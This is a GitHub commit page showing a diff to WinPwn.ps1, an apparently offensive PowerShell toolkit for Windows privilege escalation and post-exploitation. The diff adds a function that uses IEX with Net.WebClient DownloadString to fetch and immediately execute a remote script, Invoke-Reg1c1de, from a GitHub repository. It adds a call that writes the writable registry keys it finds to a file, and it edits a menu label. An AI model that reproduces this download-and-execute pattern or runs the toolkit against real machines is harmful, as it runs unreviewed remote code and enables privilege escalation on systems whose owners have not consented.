Skip to content

Commit 3b426ff

Browse files
Update WinPwn.ps1
1 parent e6bd52c commit 3b426ff

1 file changed

Lines changed: 8 additions & 1 deletion

File tree

WinPwn.ps1

Lines changed: 8 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2138,6 +2138,7 @@ function otherchecks
21382138
} Else {
21392139
Write-Host "Looks good! No system path can be written to by the current user." -ForegroundColor Green
21402140
}
2141+
Reg1c1de >> $currentPath\LocalPrivEsc\WritebleRegistryKeys.txt
21412142
}
21422143

21432144
function winPEAS
@@ -2160,6 +2161,12 @@ function winPEAS
21602161
REG DELETE HKCU\Console\ /v VirtualTerminalLevel /f
21612162
}
21622163

2164+
function Reg1c1de
2165+
{
2166+
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Reg1c1de.ps1')
2167+
Invoke-Reg1c1de
2168+
}
2169+
21632170
function privescmodules
21642171
{
21652172
<#
@@ -2193,7 +2200,7 @@ __ ___ ____
21932200
do
21942201
{
21952202
Write-Host "================ WinPwn ================"
2196-
Write-Host -ForegroundColor Green '1. itm4n´s Invoke-PrivescCheck'
2203+
Write-Host -ForegroundColor Green '1. itm4ns Invoke-PrivescCheck'
21972204
Write-Host -ForegroundColor Green '2. winPEAS! '
21982205
Write-Host -ForegroundColor Green '3. Powersploits privesc checks! '
21992206
Write-Host -ForegroundColor Green '4. All other checks! '

0 commit comments

Comments
 (0)